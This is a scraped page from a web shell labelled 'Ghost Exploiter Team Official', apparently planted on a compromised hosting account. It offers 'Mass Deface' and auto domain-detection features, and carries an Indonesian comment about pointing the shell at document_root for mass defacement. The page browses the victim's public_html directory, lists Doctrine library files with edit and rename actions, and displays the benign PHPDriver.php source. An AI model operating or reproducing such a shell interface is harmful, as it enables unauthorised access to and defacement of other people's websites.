webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
doctrine
/
persistence
/
src
/
Persistence
/
Mapping
/
Driver
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
ColocatedMappingDriver.php
5.236KB
edt
ren
DefaultFileLocator.php
4.536KB
edt
ren
FileDriver.php
5.75KB
edt
ren
FileLocator.php
1.256KB
edt
ren
MappingDriver.php
1.102KB
edt
ren
MappingDriverChain.php
3.226KB
edt
ren
PHPDriver.php
1.001KB
edt
ren
StaticPHPDriver.php
3.173KB
edt
ren
SymfonyFileLocator.php
7.073KB
edt
ren
<?php declare(strict_types=1); namespace Doctrine\Persistence\Mapping\Driver; use Doctrine\Persistence\Mapping\ClassMetadata; /** * The PHPDriver includes php files which just populate ClassMetadataInfo * instances with plain PHP code. */ class PHPDriver extends FileDriver { /** * @var ClassMetadata * @psalm-var ClassMetadata<object> */ protected $metadata; /** @param string|array<int, string>|FileLocator $locator */ public function __construct($locator) { parent::__construct($locator, '.php'); } /** * {@inheritDoc} */ public function loadMetadataForClass(string $className, ClassMetadata $metadata) { $this->metadata = $metadata; $this->loadMappingFile($this->locator->findMappingFile($className)); } /** * {@inheritDoc} */ protected function loadMappingFile(string $file) { $metadata = $this->metadata; include $file; return [$metadata->getName() => $metadata]; } }
<=Back
Liking